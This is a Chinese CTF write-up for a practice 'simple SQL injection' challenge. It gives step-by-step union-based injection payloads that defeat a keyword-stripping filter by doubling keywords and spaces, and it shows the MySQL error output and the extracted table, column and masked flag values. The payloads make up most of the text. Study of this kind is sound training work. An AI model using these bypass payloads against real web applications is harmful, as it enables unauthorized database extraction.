> For the complete documentation index, see [llms.txt](https://l1nwatch.gitbook.io/ctf/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://l1nwatch.gitbook.io/ctf/shi-yan-ba/web/jian-dan-de-sql-zhu-ru.md).

# 简单的sql注入

## 题目

通过注入获得flag值（提交格式：flag{}）。

解题链接： <http://ctf5.shiyanbar.com/423/web/>

## writeup

参考：<http://hebin.me/2017/09/06/%E8%A5%BF%E6%99%AEctf-%E7%AE%80%E5%8D%95%E7%9A%84sql%E6%B3%A8%E5%85%A5/>

### 步骤

首先，爆出表名：

```
1'  unionunion  selectselect  table_name  fromfrom  information_schema.tables  wherewhere  '1'='1
```

再爆出列名：

```
1' unionunion  selectselect  column_namcolumn_namee  fromfrom  information_schema.coluinformation_schema.columnsmns  wherewhere  table_name='flag
```

再直接看值：

```
1'  unionunion  selectselect  flag  fromfrom  flag  wherewhere  '1'='1
```

### 探究

1. 输入数值1返回结果：

```
ID: 1
name: baloteli
```

在输入1'(注意输入法)：

```
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1
```

可见输入的是字符串类型，并且存在注入点。

1. 由于题目问过滤了什么，干脆将几个关键字一起写出来，输入如下语句：

```
1 and or # --  union select from where
```

```
ID: 1 or    where
name: baloteli
```

从id项看出有几个已经被过滤掉了，而且是直接把关键字给去掉，那么可以用类似ab(abc)c来绕过过滤，abc是要绕过的关键字，使用时不加括号，这里加括号只是为了区分.

1. 开始爆表名，在之前应该先猜解union需要的列数，我直接猜的1列：

```
1' ununionion seselectlect 1 frofromm information_schema.tables where '1'='1
```

```
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ununionion seselectlect 1 frofromm information_schema.tables '1'='1'' at line 1
```

尴尬了。。几个关键字竟然没有成功绕过，猜想过滤时应该是从单词开始进行匹配的，那么可以尝试将两个同样的关键字首尾连起来测试，并且从返回结果还可以看到where关键字被过滤了（不知道为什么第一步中没被过滤）。

```
1' unionunion selectselect table_name fromfrom information_schema.tables wherewhere '1'='1
```

```
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'unionselecttable_name frominformation_schema.tables where'1'='1'' at line 1
```

又报错了，但是可以发现几个关键字已经绕过过滤了，但是他们却连在了一起，可能空格已被过滤了，再试试

```
1'  unionunion  selectselect  table_name  fromfrom  information_schema.tables  wherewhere  '1'='1
```

就是用两个空格代替一个，方法和关键字一样。然后直接返回一大堆结果，可以发现一个特殊的表名

```
ID: 1'  union select table_name  from information_schema.tables  where '1'='1
name: flag
```

1. 爆出列名：

```
1'  unionunion  selectselect  column_name  fromfrom  information_schema.columns  wherewhere  table_name='flag
```

```
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'from   where table_name='flag'' at line 1
```

`information_schema.columns` 跑哪了？估计被过滤了

```
1'  unionunion  selectselect  column_name  fromfrom  information_schema.columnsinformation_schema.columns  wherewhere  table_name='flag
```

结果仍然是刚才的错误警告，不知道后台怎么过滤的，再换一种ab（abc）c形式的过滤

```
1' unionunion  selectselect  column_name  fromfrom information_schema.coluinformation_schema.columnsmns  wherewhere  table_name='flag
```

```
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'where table_name='flag'' at line 1
```

这下有点懵了，这会是什么错误？想了半天，可能是把column\_name也给过滤了吧：

```
1' unionunion  selectselect  column_namcolumn_namee  fromfrom  information_schema.coluinformation_schema.columnsmns  wherewhere  table_name='flag
```

```
ID: 1' union select column_name  from information_schema.columns  where table_name='flag
name: baloteli

ID: 1' union select column_name  from information_schema.columns  where table_name='flag
name: flag

ID: 1' union select column_name  from information_schema.columns  where table_name='flag
name: id
```

找到特殊列flag

1. 直接查询flag：

```
1'  unionunion  selectselect  flag  fromfrom  flag  wherewhere  '1'='1
```

```
ID: 1'  union select flag  from flag  where '1'='1
name: baloteli

ID: 1'  union select flag  from flag  where '1'='1
name: flag{******}
```
